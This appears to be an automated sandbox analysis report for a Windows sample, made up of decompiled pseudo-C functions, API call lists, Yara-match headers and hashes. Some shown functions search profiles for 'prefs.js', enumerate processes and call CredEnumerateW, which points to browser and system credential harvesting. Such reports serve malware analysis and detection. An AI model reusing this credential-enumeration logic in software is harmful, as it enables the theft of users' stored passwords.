                                                                                					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
                                                                                					L14:
                                                                                					if(_t50 != 0) {
                                                                                						_push(0xa);
                                                                                						_push(_t47);
                                                                                						_push(_t50);
                                                                                						L0041158E();
                                                                                					}
                                                                                					goto L16;
                                                                                				}
                                                                                				if(_t57 == 0) {
                                                                                					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
                                                                                					goto L20;
                                                                                				}
                                                                                				if(_t22 == 0xfffffff6) {
                                                                                					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
                                                                                					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
                                                                                					goto L16;
                                                                                				}
                                                                                				if(_t22 == 0) {
                                                                                					return __ecx + 0xc;
                                                                                				}
                                                                                				if(_t22 == 1) {
                                                                                					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
                                                                                					goto L20;
                                                                                				}
                                                                                				if(_t22 == 2) {
                                                                                					return __ecx + 0x90;
                                                                                				}
                                                                                				if(_t22 == 3) {
                                                                                					return __ecx + 0x110;
                                                                                				}
                                                                                				if(_t22 == 4) {
                                                                                					_t50 =  *((intOrPtr*)(__ecx + 0x394));
                                                                                					goto L14;
                                                                                				}
                                                                                				if(_t22 != 5) {
                                                                                					goto L16;
                                                                                				}
                                                                                				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
                                                                                					_push(0x10);
                                                                                				} else {
                                                                                					_push(0xf);
                                                                                				}
                                                                                				_pop(_t42);
                                                                                				goto L20;
                                                                                			}


















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _ultoasprintf
                                                                                • String ID: %s %s %s
                                                                                • API String ID: 432394123-3850900253
                                                                                • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                                                • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                				char _v328;
                                                                                				char _v652;
                                                                                				char _v928;
                                                                                				char _v1296;
                                                                                				signed int _v1300;
                                                                                				void* __esi;
                                                                                				char* _t26;
                                                                                				intOrPtr* _t43;
                                                                                
                                                                                				_v1300 = _v1300 | 0xffffffff;
                                                                                				_v1296 = 0;
                                                                                				_v328 = 0;
                                                                                				_v652 = 0;
                                                                                				_t43 = __ecx;
                                                                                				E00406E68( &_v1300, __eflags, "*.*", _a4);
                                                                                				while(E00406EC3( &_v1300) != 0) {
                                                                                					__eflags = E00406E2D( &_v1300);
                                                                                					if(__eflags == 0) {
                                                                                						__eflags = _a8 - 1;
                                                                                						if(_a8 > 1) {
                                                                                							_t26 =  &_v928;
                                                                                							_push("prefs.js");
                                                                                							_push(_t26);
                                                                                							L004115B2();
                                                                                							__eflags = _t26;
                                                                                							if(_t26 == 0) {
                                                                                								__eflags = E0040614B( &_v652);
                                                                                								if(__eflags != 0) {
                                                                                									E0040D1EC(_t43, __eflags,  &_v652);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_a8 = _a8 + 1;
                                                                                						E0040D37A(_t43, __eflags,  &_v652, _a8);
                                                                                					}
                                                                                				}
                                                                                				E00406F5B( &_v1300);
                                                                                				return 1;
                                                                                			}












                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$FileFindFirst
                                                                                • String ID: *.*$prefs.js
                                                                                • API String ID: 2516927864-1592826420
                                                                                • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                                                • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				signed int _v36;
                                                                                				signed int _v44;
                                                                                				intOrPtr _v48;
                                                                                				char* _v52;
                                                                                				intOrPtr _v56;
                                                                                				signed int _v64;
                                                                                				intOrPtr _v68;
                                                                                				intOrPtr _v76;
                                                                                				struct tagOFNA _v80;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr* _t33;
                                                                                				intOrPtr _t34;
                                                                                				char* _t38;
                                                                                
                                                                                				_t38 = __edi;
                                                                                				_t34 = __ecx;
                                                                                				_t33 = __ebx;
                                                                                				_t23 = 1;
                                                                                				if(__ebx != 0) {
                                                                                					_t23 =  *__ebx;
                                                                                				}
                                                                                				_v64 = _v64 & 0x00000000;
                                                                                				_v44 = _v44 & 0x00000000;
                                                                                				_v36 = _v36 & 0x00000000;
                                                                                				_v56 = _t23;
                                                                                				_v32 = _a8;
                                                                                				_v20 = _a12;
                                                                                				_v76 = _t34;
                                                                                				_v80 = 0x4c;
                                                                                				_v68 = _a4;
                                                                                				_v52 = _t38;
                                                                                				_v48 = 0x104;
                                                                                				_v28 = 0x80806;
                                                                                				if(GetSaveFileNameA( &_v80) == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					if(_t33 != 0) {
                                                                                						 *_t33 = _v56;
                                                                                					}
                                                                                					strcpy(_t38, _v52);
                                                                                					return 1;
                                                                                				}
                                                                                			}




















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileNameSavestrcpy
                                                                                • String ID: L
                                                                                • API String ID: 1182090483-2909332022
                                                                                • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                                                • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040ADB3(void* __ebx, void* __eflags) {
                                                                                				char _v265;
                                                                                				char _v526;
                                                                                				char _v787;
                                                                                				void _v1048;
                                                                                				void _v3648;
                                                                                				intOrPtr _v3652;
                                                                                				char _v3660;
                                                                                				void* _t30;
                                                                                
                                                                                				_t30 = __ebx;
                                                                                				_v3660 = 0x41300c;
                                                                                				memset( &_v3648, 0, 0x10);
                                                                                				_v1048 = 0;
                                                                                				_v787 = 0;
                                                                                				_v526 = 0;
                                                                                				_v265 = 0;
                                                                                				_v3652 = 0x6c;
                                                                                				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
                                                                                				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
                                                                                					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
                                                                                				}
                                                                                				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
                                                                                				return E0040143D( &_v3660);
                                                                                			}












                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040ADD3
                                                                                • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                                  • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FocusMessagePostmemset
                                                                                • String ID: l
                                                                                • API String ID: 3436799508-2517025534
                                                                                • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                                • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00408441(void** __esi, struct HWND__* _a4) {
                                                                                				long _v12;
                                                                                				signed int _v24;
                                                                                				signed int _v28;
                                                                                				short _v32;
                                                                                				void* _v40;
                                                                                				long _t17;
                                                                                				short* _t23;
                                                                                				int _t24;
                                                                                				void** _t25;
                                                                                
                                                                                				_t25 = __esi;
                                                                                				_t24 = 0;
                                                                                				if(_a4 != 0) {
                                                                                					_t17 = memset( *__esi, 0, __esi[1] << 2);
                                                                                					if(__esi[1] > 0) {
                                                                                						do {
                                                                                							_v28 = _v28 & 0x00000000;
                                                                                							_v24 = _v24 & 0x00000000;
                                                                                							_t23 =  *_t25 + _t24 * 4;
                                                                                							_v40 = 0x22;
                                                                                							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
                                                                                							if(_t17 != 0) {
                                                                                								 *_t23 = _v32;
                                                                                								_t17 = _v12;
                                                                                								 *(_t23 + 2) = _t17;
                                                                                							}
                                                                                							_t24 = _t24 + 1;
                                                                                						} while (_t24 < _t25[1]);
                                                                                					}
                                                                                				}
                                                                                				return _t17;
                                                                                			}













                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSendmemset
                                                                                • String ID: "
                                                                                • API String ID: 568519121-123907689
                                                                                • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                                • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr _v48;
                                                                                				char* _v52;
                                                                                				intOrPtr _v56;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr _v68;
                                                                                				intOrPtr _v76;
                                                                                				struct tagOFNA _v80;
                                                                                
                                                                                				_v76 = __eax;
                                                                                				_v68 = _a4;
                                                                                				_v64 = 0;
                                                                                				_v44 = 0;
                                                                                				_v36 = 0;
                                                                                				_v32 = _a8;
                                                                                				_v80 = 0x4c;
                                                                                				_v56 = 1;
                                                                                				_v52 = __esi;
                                                                                				_v48 = 0x104;
                                                                                				_v28 = 0x81804;
                                                                                				_v20 = 0x413008;
                                                                                				if(GetOpenFileNameA( &_v80) == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					strcpy(__esi, _v52);
                                                                                					return 1;
                                                                                				}
                                                                                			}
















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileNameOpenstrcpy
                                                                                • String ID: L
                                                                                • API String ID: 812585365-2909332022
                                                                                • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                                                • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadMenuA.USER32 ref: 00407BC1
                                                                                • sprintf.MSVCRT ref: 00407BE4
                                                                                  • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                                                  • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                                                  • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                                                  • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                                                  • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                                                  • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                                                  • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                • String ID: menu_%d
                                                                                • API String ID: 3671758413-2417748251
                                                                                • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                                                • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406325(char* _a4) {
                                                                                
                                                                                				if( *0x417550 == 0) {
                                                                                					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
                                                                                				}
                                                                                				strcpy(_a4, 0x417550);
                                                                                				return  *0x417658;
                                                                                			}




                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DirectoryWindowsstrcpy
                                                                                • String ID: PuA
                                                                                • API String ID: 531766897-3228437271
                                                                                • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                                                • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00408348(char* __esi) {
                                                                                				char* _t2;
                                                                                				char* _t6;
                                                                                
                                                                                				_t6 = __esi;
                                                                                				E00406160(__esi);
                                                                                				_t2 = strrchr(__esi, 0x2e);
                                                                                				if(_t2 != 0) {
                                                                                					 *_t2 = 0;
                                                                                				}
                                                                                				return strcat(_t6, "_lng.ini");
                                                                                			}






                                                                                APIs
                                                                                  • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                                                • strrchr.MSVCRT ref: 00408351
                                                                                • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleNamestrcatstrrchr
                                                                                • String ID: _lng.ini
                                                                                • API String ID: 3097366151-1948609170
                                                                                • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
                                                                                • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {
                                                                                
                                                                                				_t2 =  &_a12; // 0x403428
                                                                                				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
                                                                                			}




                                                                                APIs
                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileString
                                                                                • String ID: (4@$Server Details
                                                                                • API String ID: 1096422788-3984282551
                                                                                • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                                                • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E004084CE(intOrPtr* __esi, void* __eflags) {
                                                                                				intOrPtr* _t22;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t31 = __esi;
                                                                                				 *__esi = 0x413320;
                                                                                				_t22 = E00406549(0x1c8, __esi);
                                                                                				_push(0x14);
                                                                                				L004115D0();
                                                                                				if(_t22 == 0) {
                                                                                					_t22 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                					 *_t22 = 0;
                                                                                					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                				}
                                                                                				_push(0x14);
                                                                                				 *((intOrPtr*)(_t31 + 4)) = _t22;
                                                                                				L004115D0();
                                                                                				if(_t22 == 0) {
                                                                                					_t22 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                					 *_t22 = 0;
                                                                                					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                				}
                                                                                				_push(0x14);
                                                                                				 *((intOrPtr*)(_t31 + 8)) = _t22;
                                                                                				L004115D0();
                                                                                				if(_t22 == 0) {
                                                                                					_t22 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                					 *_t22 = 0;
                                                                                					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                				}
                                                                                				_push(0x14);
                                                                                				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
                                                                                				L004115D0();
                                                                                				if(_t22 == 0) {
                                                                                					_t22 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                                                					 *_t22 = 0;
                                                                                					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                                                					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
                                                                                				return _t31;
                                                                                			}






                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                                • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406A74(void* __eax, void* __ecx, char* _a4) {
                                                                                				int _v8;
                                                                                				void* __edi;
                                                                                				int _t27;
                                                                                				intOrPtr _t28;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t52;
                                                                                				void** _t55;
                                                                                				void** _t56;
                                                                                				void* _t59;
                                                                                
                                                                                				_t59 = __eax;
                                                                                				_t27 = strlen(_a4);
                                                                                				_t42 =  *((intOrPtr*)(_t59 + 4));
                                                                                				_t52 = _t42 + _t27 + 1;
                                                                                				_v8 = _t27;
                                                                                				_t28 =  *((intOrPtr*)(_t59 + 0x14));
                                                                                				 *((intOrPtr*)(_t59 + 4)) = _t52;
                                                                                				_t55 = _t59 + 0x10;
                                                                                				if(_t52 != 0xffffffff) {
                                                                                					E004060FA(_t59, _t52, _t55, 1, _t28);
                                                                                				} else {
                                                                                					free( *_t55);
                                                                                				}
                                                                                				_t53 =  *(_t59 + 0x1c);
                                                                                				_t31 =  *((intOrPtr*)(_t59 + 0x18));
                                                                                				_t56 = _t59 + 0xc;
                                                                                				if( *(_t59 + 0x1c) != 0xffffffff) {
                                                                                					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
                                                                                				} else {
                                                                                					free( *_t56);
                                                                                				}
                                                                                				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
                                                                                				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
                                                                                				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
                                                                                				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
                                                                                				_t25 =  *(_t59 + 0x1c) - 1; // -1
                                                                                				return _t25;
                                                                                			}














                                                                                APIs
                                                                                • strlen.MSVCRT ref: 00406A80
                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                                  • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                                  • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                                  • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                                • memcpy.MSVCRT ref: 00406AE3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                • String ID:
                                                                                • API String ID: 3669619086-0
                                                                                • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                                • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                  • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 004111B6
                                                                                • memset.MSVCRT ref: 004111CB
                                                                                • Process32FirstW.KERNEL32(?,?), ref: 004111E7
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
                                                                                • memset.MSVCRT ref: 00411253
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 004112C3
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
                                                                                • free.MSVCRT(?), ref: 0041130D
                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00411356
                                                                                • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                • API String ID: 3536422406-1740548384
                                                                                • Opcode ID: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                • Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
                                                                                • Opcode Fuzzy Hash: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                • Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004101DA
                                                                                • wcsrchr.MSVCRT ref: 004101F2
                                                                                • memset.MSVCRT ref: 004102D9
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326
                                                                                  • Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
                                                                                  • Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11
                                                                                  • Part of subcall function 00408619: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 00408652
